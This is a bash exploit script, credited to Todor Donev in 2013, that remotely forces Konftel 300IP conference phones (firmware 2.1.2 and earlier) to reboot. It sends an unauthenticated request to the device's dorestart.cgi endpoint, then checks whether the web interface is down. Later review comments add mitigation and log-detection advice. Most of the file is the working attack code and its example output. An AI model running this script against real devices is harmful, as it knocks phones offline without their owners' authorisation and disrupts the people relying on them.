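#!/bin/bash
# Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit
#
# by Todor Donev / 03.2013 / Sofia,Bulgaria
# email: todor dot donev at gmail com
# type: hardware
#
# The Konftel 300IP is a flexible SIP-based conference phone,
# perfect for companies that use IP voice services. Its clear,
# natural sound comes from OmniSound HD, Konftel's patented
# wideband audio technology. The stylishly designed
# Konftel 300IP is packed with intelligent features for more
# efficient conference calls. Record and store meetings on a
# SD memory card. Use the conference guide to call
# pre-programmed groups with just a few simple pushes of a
# button. Conveniently import and export contact details via
# the Web interface. Create your own phone book with the
# personal user profile feature. The Konftel 300IP is also
# ideal for larger conferences since it can accommodate
# expansion microphones, an external wireless headset and a
# PA system. With the Konftel 300IP your company will have
# a conference phone that combines all the benefits of IP
# voice service with innovative new features.
#
# Example usage:
# [exploits@amnesium]$ ./k300IP-rbr.sh 192.168.1.180
# Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit
# Rebooting 192.168.1.180..
# Sleeping 30 secs, before rebooting
# curl: (7) couldn't connect to host
#
# Special greetings for Tsvetelina Emirska, Stilyan Angelov and all my other friends!
#
# NOTE(review): the request below carries no credentials or session data, so
# the underlying weakness appears to be a restart CGI that acts on
# unauthenticated requests (an availability issue, per the title above).
# Mitigation: keep the phone's web management interface off untrusted
# networks and confirm with the vendor whether firmware later than 2.1.2
# addresses it. Detection: look for requests to /cgi-bin/dorestart.cgi in
# proxy or network logs, and for unexpected device restarts.

# Exactly one argument (the device's host name or IP address) is required.
# Usage goes to stderr with a non-zero status so callers can detect misuse;
# the original exited 0 here because a bare `exit` reuses echo's status.
if [ "$#" -ne 1 ]; then
  echo "usg: $0 <victim>" >&2
  exit 2
fi

target=$1

echo "Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit"
echo "Rebooting ${target}.."

# The URL is quoted: unquoted, the `?` is a glob character and the argument
# is subject to word splitting. Output is discarded and a curl failure is
# deliberately not treated as fatal, as in the original.
curl "http://${target}/cgi-bin/dorestart.cgi?doit=Reboot" >/dev/null 2>&1

# Message text kept as-is; the restart request has already been sent here.
echo "Sleeping 30 secs before rebooting"
sleep 30

# Probe the web interface again. A connection error (as in the example output
# above) suggests the device is down or restarting. The scheme is explicit so
# an argument starting with `-` is not parsed as a curl option.
curl "http://${target}/"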